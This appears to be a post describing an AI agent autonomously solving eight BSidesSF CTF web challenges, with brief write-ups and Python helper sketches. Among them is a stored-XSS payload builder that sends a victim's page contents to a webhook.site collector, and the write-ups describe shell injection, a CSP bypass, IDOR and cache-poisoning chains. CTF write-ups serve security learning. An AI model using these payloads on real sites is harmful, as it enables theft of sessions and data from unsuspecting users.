I saw the BSidesSF CTF 2026 challenges go live and wondered: can my AI hunting agent solve them? The CTF had 57 challenges across multiple categories (crypto, reversing, forensics, pwn, etc.), but I focused only on the 8 web application challenges.
8/8 solved, fully autonomous. No Kali, no Docker, just my Windows 11 machine with curl, Python, interactsh, and webhook.site for blind issues.
Below is the summary generated by the agent:
1. gitfab (Shell Injection)
Agent fuzzed every ASCII character through the filter to build a complete map
of what's stripped vs preserved. Then chained " and \n (newline), the two
characters the filter missed. Confirmed RCE with sleep 3 timing (3.62s vs 0.4s
baseline) before reading the flag.
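The character-mapping step can be sketched roughly as follows. This is a minimal illustration, not the agent's actual code: `map_filter` and `toy_filter` are hypothetical names, and `toy_filter` is a local stand-in for the remote filter (in the real challenge each probe would go over HTTP).

```python
def map_filter(apply_filter):
    """Return (preserved, stripped) sets of ASCII characters for a filter."""
    preserved, stripped = set(), set()
    for ch in map(chr, range(128)):
        probe = f"A{ch}B"  # markers make it obvious whether ch survived
        if apply_filter(probe) == probe:
            preserved.add(ch)
        else:
            stripped.add(ch)
    return preserved, stripped


def toy_filter(s):
    # Hypothetical filter: strips common shell metacharacters,
    # but forgets the double quote and the newline.
    return "".join(c for c in s if c not in ";|&$`'<>(){}\\")


preserved, stripped = map_filter(toy_filter)
print(sorted(stripped))
```

Any character that lands in `preserved` and still has meaning to a shell is a candidate for the injection chain.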
2. web-tutorial-1 (Stored XSS)
Created a webhook.site endpoint for OOB exfil. Injected a script that fetches
/xss-one-flag from the admin's session and sends the response to webhook.site.
Admin bot executed the payload and exfiltrated the flag. Done.
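A payload of this shape could be generated like so. This is a sketch under assumptions: `build_exfil_payload` is a hypothetical helper, the `d` query parameter is arbitrary, and the collector URL is a placeholder for your own webhook.site endpoint.

```python
import json


def build_exfil_payload(flag_path, collector_url):
    """Build a script tag that reads flag_path in the victim's session
    and forwards the response body to collector_url."""
    js = (
        f"fetch({json.dumps(flag_path)})"
        ".then(r => r.text())"
        f".then(t => fetch({json.dumps(collector_url)} + '?d=' + encodeURIComponent(t)))"
    )
    return f"<script>{js}</script>"


# Placeholder collector; replace with your own endpoint.
print(build_exfil_payload("/xss-one-flag", "https://webhook.site/YOUR-UUID"))
```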
3. web-tutorial-2 (CSP Bypass)
Noticed CSP uses nonces but is missing the base-uri directive. Found a nonced
<script src="test.js"> using a relative path. Injected a <base> tag pointing to
webhook.site, so the browser loaded test.js from the attacker server while the
nonce still validated. Hosted the exfil JS on webhook.site.
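The missing-directive check is easy to automate. A minimal sketch, with hypothetical function names and a made-up example header; note that base-uri does not fall back to default-src, so its absence matters even under an otherwise strict policy.

```python
def parse_csp(header):
    """Split a Content-Security-Policy header into {directive: [sources]}."""
    directives = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if tokens:
            # Browsers honour the first occurrence of a directive.
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives


def base_tag_hijack_possible(header):
    """True when nothing in the policy restricts <base href=...>."""
    return "base-uri" not in parse_csp(header)


# Made-up policy for illustration only.
print(base_tag_hijack_possible("script-src 'nonce-abc123'; object-src 'none'"))
```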
4. three-questions-1 (Game Logic)
No exploit. The agent tried SQLi, SSTI, IDOR — all failed. Then it just played
the game legitimately — built a decision tree from 6 yes/no questions, asked 3
strategic ones, deduced the musical character. Won fair and square.
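One plausible way to pick "strategic" questions is to choose, at each step, the one that splits the remaining candidates most evenly. The sketch below assumes that approach; the characters and attributes are invented placeholders, not the challenge's real data.

```python
def best_question(candidates, questions):
    """Pick the question whose yes/no split is closest to 50/50."""
    def imbalance(q):
        yes = sum(1 for attrs in candidates.values() if attrs[q])
        return abs(2 * yes - len(candidates))
    return min(questions, key=imbalance)


def narrow(candidates, question, answer):
    """Keep only candidates consistent with the given answer."""
    return {n: a for n, a in candidates.items() if a[question] == answer}


# Hypothetical data for illustration.
CANDIDATES = {
    "alpha": {"is_human": True, "sings_solo": True},
    "beta": {"is_human": True, "sings_solo": False},
    "gamma": {"is_human": False, "sings_solo": False},
    "delta": {"is_human": False, "sings_solo": False},
}
QUESTIONS = ["sings_solo", "is_human"]

first = best_question(CANDIDATES, QUESTIONS)
remaining = narrow(CANDIDATES, first, True)
print(first, sorted(remaining))
```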
5. three-questions-2 (Info Disclosure)
Found <!-- debug endpoints: /debug/game-state?... --> buried in HTML comments.
Called the debug endpoint to leak the assigned character name. Guessed correctly.
Done.
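Pulling comments out of a page is a one-regex job. A minimal sketch; `find_comments` is a hypothetical helper and the sample HTML is made up around the comment quoted above.

```python
import re

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.DOTALL)


def find_comments(html):
    """Return the text of every HTML comment in the page."""
    return [c.strip() for c in COMMENT_RE.findall(html)]


sample = "<html><!-- debug endpoints: /debug/game-state?... --><body>hi</body></html>"
for comment in find_comments(sample):
    print(comment)
```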
6. three-questions-3 (IDOR)
Debug endpoint now needs a user_id param. Agent decoded the Flask session cookie
(base64 → JSON → _user_id field), extracted the internal numeric ID, used it
for IDOR on the debug endpoint. Cookie crumbs led the way.
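Reading a Flask session cookie needs no secret key, since the payload is only signed, not encrypted. A sketch assuming the default itsdangerous layout (payload.timestamp.signature, with a leading dot when the payload is zlib-compressed); `decode_flask_session` is a hypothetical helper name.

```python
import base64
import json
import zlib


def decode_flask_session(cookie):
    """Decode the payload of a Flask session cookie without verifying it."""
    compressed = cookie.startswith(".")
    payload = cookie.lstrip(".").split(".")[0]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    raw = base64.urlsafe_b64decode(payload)
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)
```

The returned dict would then expose fields such as _user_id, which is the value the debug endpoint wanted.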
7. three-questions-4 (JSONP XSS Chain)
Three-step exploit chain. Found /characters.js?callback=X, an unsanitized JSONP
endpoint. CSP is script-src 'self', but the JSONP endpoint is same-origin, so it
bypasses CSP. Sent the admin a message containing a script tag pointing to the
JSONP endpoint with an exfil callback. Admin bot executed it and exfiltrated the
character list via interactsh. Used the debug endpoint character list to win.
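Whether a JSONP endpoint is unsanitized can be tested by sending a callback value that is not a plain identifier and checking whether it comes back verbatim. A rough sketch; the function name, the allowlist regex, and the sample bodies are all assumptions for illustration.

```python
import re

# What a strict endpoint would typically allow: dotted JS identifiers only.
SAFE_CALLBACK = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")


def jsonp_is_injectable(body, probe):
    """True if an unsafe callback value is reflected verbatim as the call."""
    if SAFE_CALLBACK.match(probe):
        return False  # probe proves nothing: a strict endpoint accepts it too
    return body.lstrip().startswith(probe + "(")


# Made-up response bodies for the same probe.
print(jsonp_is_injectable('alert(1);x(["a","b"])', "alert(1);x"))
print(jsonp_is_injectable('x(["a","b"])', "alert(1);x"))
```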
8. builds-as-a-service (BuildKit Cache Poisoning)
The boss. Agent solved 28-bit hashcash PoW through a web terminal (ttyd).
When Python was too slow, it wrote a C hashcash miner, compiled with GCC -O3,
debugged its own SHA-1 implementation, and fixed it. Then: installed buildctl
inside a Docker build, queried the BuildKit gRPC API on localhost:1234,
extracted the BUILD_VERSION from cached layers, reconstructed the flag
Dockerfile with a dummy secret, triggered a cache hit (BuildKit doesn't
include secret content in cache keys), and exported the cached image containing the real flag.
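For the proof-of-work step, a 28-bit target means roughly 2^28 (about 268 million) SHA-1 attempts on average, which explains why pure Python was too slow. The sketch below shows the idea at a much smaller difficulty; the exact stamp format the challenge used is not given here, so hashing prefix + nonce is an assumption.

```python
import hashlib
from itertools import count


def leading_zero_bits(digest):
    """Count leading zero bits of a digest."""
    n = int.from_bytes(digest, "big")
    return len(digest) * 8 - n.bit_length()


def mine(prefix, bits):
    """Find a nonce so that SHA-1(prefix + nonce) has >= bits leading zero bits."""
    for nonce in count():
        candidate = f"{prefix}{nonce}".encode()
        if leading_zero_bits(hashlib.sha1(candidate).digest()) >= bits:
            return nonce


# 12 bits takes a few thousand hashes; 28 bits is about 65,000 times more work.
nonce = mine("demo:", 12)
print(nonce)
```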
#Bugbounty #ai